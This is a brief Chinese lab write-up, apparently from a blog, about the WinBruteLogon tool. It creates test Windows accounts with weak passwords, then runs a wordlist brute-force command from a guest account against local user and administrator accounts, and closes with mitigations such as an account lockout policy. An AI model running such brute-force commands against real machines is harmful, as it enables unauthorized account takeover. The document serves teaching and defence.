在github上看到的不错的项目,分享记录一下。
0x00 前期准备
创建一个新的管理员用户:
net user iamadmin /add
net user iamadmin 12345688 (密码
12345688
)net localgroup administrators iamadmin /add
创建普通账户:
net user iamhacker /add
net user iamhacker hacker88 (密码hacker88)
创建宾客账户:
net user iamguest /add
net localgroup users iamguest /delete
net localgroup guests iamguest /add
切换到宾客账户(iamguest)。下载WinBruteLogon.exe,并准备好字典。
0x01 进行爆破
爆破普通账户:
WinBruteLogon.exe -u iamhacker -w wordlist.txt
爆破管理员账户同理,也可以加-v参数进入详细模式。
0x02 修复措施
- 应用程序白名单。
- 禁用宾客账户。
- 设置高强度密码。
- 实施安全锁定策略:打开secpol.msc然后转到Account Policies>Account Lockout Policy,并使用(1到999)中的所需值编辑Account lockout threshold,该值表示锁定之前可能尝试的次数。